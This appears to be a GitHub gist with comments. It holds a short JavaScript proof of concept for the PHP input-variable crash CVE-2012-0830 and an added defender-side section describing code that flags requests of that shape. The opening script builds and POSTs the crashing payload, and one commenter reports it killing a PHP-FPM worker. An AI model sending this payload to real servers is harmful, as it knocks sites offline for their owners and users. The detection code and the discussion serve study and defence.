// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
// Generate 1000 normal keys and one array
function createEvilObj () {
  var evil_obj = {};
  for (var i = 0; i < 1001; i++) {
    evil_obj[i] = 1;
  }
  // One array-style variable after the scalar keys
  evil_obj['kill[]'] = 'kill';
  return evil_obj;
}

// Serialize Javascript object into POST data (key=value pairs joined with &)
function serializeObj (obj) {
  var str = [];
  for (var p in obj) {
    str.push(p + "=" + obj[p]);
  }
  return str.join("&");
}

// Run attack: POST the serialized body back to the current page
function attackSite () {
  var bad = serializeObj(createEvilObj());
  var xhr = new XMLHttpRequest();
  xhr.open("POST", location.href, true);
  // Browsers set Content-Length themselves and reject it as a manual header
  xhr.setRequestHeader('Content-Length', bad.length);
  xhr.send(bad);
}
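A defender-side counterpart to the request shape above, added here and not part of the gist: it parses an application/x-www-form-urlencoded body and flags an array-style key arriving past PHP's default max_input_vars limit of 1000. The two sample bodies and the function names are constructed for this example.

```javascript
// Added example (not from the gist): inspect a form-encoded request body against
// PHP's default max_input_vars (1000) and report the shape the PoC produces:
// more than the limit of scalar variables followed by an array-style key.
const MAX_INPUT_VARS = 1000; // PHP default for php.ini max_input_vars

function parseFormBody(body) {
  // Split into key/value pairs; decode percent-encoding, treat '+' as space.
  const dec = (s) => decodeURIComponent(s.replace(/\+/g, ' '));
  return body.split('&').filter(Boolean).map((pair) => {
    const idx = pair.indexOf('=');
    const rawKey = idx === -1 ? pair : pair.slice(0, idx);
    const rawVal = idx === -1 ? '' : pair.slice(idx + 1);
    return { key: dec(rawKey), value: dec(rawVal) };
  });
}

function inspectFormBody(body, limit = MAX_INPUT_VARS) {
  const pairs = parseFormBody(body);
  // Array-style keys ("name[]" or "name[idx]") positioned beyond the limit.
  const overflowArrayKeys = pairs
    .map((p, i) => ({ key: p.key, position: i + 1 }))
    .filter((p) => p.position > limit && /\[[^\]]*\]$/.test(p.key))
    .map((p) => p.key);
  return {
    total: pairs.length,
    overLimit: pairs.length > limit,
    overflowArrayKeys,
    // Matches the PoC pattern: an array variable arriving after the cap.
    suspicious: overflowArrayKeys.length > 0,
  };
}

// Constructed sample bodies: a benign form and one shaped like the PoC request.
function benignBody() {
  return 'user=alice&action=save&tags%5B%5D=a&tags%5B%5D=b';
}
function pocShapedBody() {
  const parts = [];
  for (let i = 0; i < 1001; i++) parts.push(`${i}=1`);
  parts.push('kill%5B%5D=kill');
  return parts.join('&');
}
```

Running `inspectFormBody(pocShapedBody())` reports 1002 variables with `kill[]` past the cap, while the benign body's `tags[]` keys are within the limit and not flagged.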


@adrian-rt adrian-rt commented Feb 2, 2012

There are actually 1001 normal keys + one array there.



@Tatsh Tatsh commented Feb 3, 2012

My server uses nginx and proxies through PHP-FPM. For one thing, Chrome refuses line 29 (at least in the console). But this does work. A call to attackSite() results in one of the PHP instances dying:

2012/02/03 10:06:42 [error] 22018#0: *692 recv() failed (104: Connection reset by peer) while reading response header from upstream

Then it is brought back up. So I guess if I had a lot of people doing this attack even with PHP-FPM there'd be some real trouble.



@adrian-rt adrian-rt commented Feb 4, 2012

It was just an observation really. Can you provide some technical details about what exactly happens inside PHP?
I know some PHP internals, but not enough for this actually... Thanks!
